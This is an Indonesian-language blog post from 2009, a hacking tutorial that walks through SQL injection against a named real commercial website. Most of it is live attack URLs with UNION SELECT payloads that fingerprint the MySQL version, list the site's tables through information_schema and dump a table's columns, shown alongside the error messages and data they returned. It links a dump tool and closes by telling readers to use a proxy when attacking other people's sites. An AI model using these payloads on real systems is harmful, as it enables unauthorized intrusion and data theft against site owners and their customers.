Powered By Blogger

Saturday, March 28, 2009

SQL INJECTION V.5

Hacking Website dengan menggunakan SQL injection V.5

TARGET

http://www.cleanchemicalfree.ca

http://www.cleanchemicalfree.ca/product.php?id=-89
Dimana ?id=6778 (angka terserah kita karena setiap web berbeda)dan di mana ?id=
Berfungsi untuk memancing error di suatu web target kita

PANCING DENGAN

?id=-89 KLU WEB MASIH NORMAL TAMBAHIN DENGAN --

UNION+ALL+SELECT
-------- dan apa yg terjadi ----

Kluar error

Could not run query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/flyingwr/public_html/cleanchemicalfree.ca/product_main.php on line 21

TAMBAHIN SEPERTI YANG SAYA TULIS DI BAWAH INI UNTUK MENCARI COLUMN YG BERMASALAH

http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,2,3,4,5,6

Tambahkan : ?id=-89+union+all+select+1,2,3,4,5,6 dan seterusnya guna mencari dan menemukan column yang kluar di web seperti di bawah ini

KLUAR DEH ERROR NYA " 2 "

Sekarang kita coba cek versi dari sql nya dengan menambahkan VERSION() di nomer column nya seperti contoh di bawah ini

http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,version(),3,4,5,6

Kluar deh Versi dari SQL nya

5.0.67-community-log

DI MANA UNTUK VERSI 5 BERBEDA DGN VERSI EMPAT

group_concat(table_name)
from+information_schema.tables+where+table_schema=database()--

LAKUKAN INJECTION SEPERTI DI BAWAH INI

http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,group_concat(table_name)%20,3,4,5,6+from+information_schema.tables+where+table_schema=database()--

Dimana group_concat(table_name) mempunyai fungsi untuk melakukan injection pada column SQL,dan menambahkan from+information_scheme.column+where+table_scheme=database()—
Di mana keterangan yang berwarna biru berfungsi untuk menampilkan database dalam web target

Dan apa yang kluar

Nama tablenya
ads,ads_backup,cleanchemicalfreenew,cleanchemicalfreeproducts,cleanchemicalfreespecials,main_page_sponsors,newAds$4

SEKARANG KITA COBA UNTUK MENCARI DI MANA LETAK USER SM PASSWORD NYA DENGAN CARA SEPERTI DI BAWAH INI

KITA PILIH cleanchemicalfreespecials DAN COBA KITA ENCRYPT DARI TEXT TO HEX

Downloud tool di bawah ini buat encrypt dari Text To Hex

http://www.freewebs.com/suk3t1r3ng/MySQL_Dump_v1.rar
Sekarang kita coba masuk lebih dalam lagi ke dalam web target
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,group_concat(table_name) %20,3,4,5,6+from+information_schema.tables+where+table_schema=database()—

group_concat----column excekusi ------ +info nama klom yg sudah di hash

ganti dengan group_concat(table_name)
group_concat(column_name)
Sedang from+information_schema.tables+where+table_schema=database()—
from+information_schema.columns+where+table_name= 0x636c65616e6368656d6963616c667265657370656369616c73
Dimana 0x636c65616e6368656d6963616c667265657370656369616c73 adalah cleanchemicalfreespecials yang sudah kita encrypt dari Text ke Hex dari tools yg sudah downloud dari web di atas
http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1, group_concat(column_name) %20,3,4,5,6+from+information_schema.columns+where+table_name= 0x636c65616e6368656d6963616c667265657370656369616c73


Kluar table di database nya
ID,Title,Desc,Price,Image,Paypal

http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1,%20group_concat(column_name)%20%20,3,4,5,6+from+information_schema.columns+where+table_name=%200x636c65616e6368656d6963616c667265657370656369616c73
Ganti (column_name) dengan ID,Title,Desc,Price,Image,Paypal
Dan ganti =%200x636c65616e6368656d6963616c667265657370656369616c73
from+information_schema.columns+where+table_name=%200x636c65616e6368656d6963616c667265657370656369616c73


http://www.cleanchemicalfree.ca/product.php?id=-89+union+all+select+1, group_concat(ID,Title,Desc,Price,Image,Paypal) from+information_schema.columns+where+table_name=cleanchemicalfreespecials

Selanjut nya selamat mencoba !!!
Yang Tunjukan hanya sebagai membelajaran saja,t3cm4n tidak bertangung jawab atas apa yg telah anda lakukan.
Nb: Jangan lupa pakai Proxy yaa klu mau mainin web orang :D

Good Luck !

Diposkan oleh Panjoel di 6:50 AM
Label:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 

Followers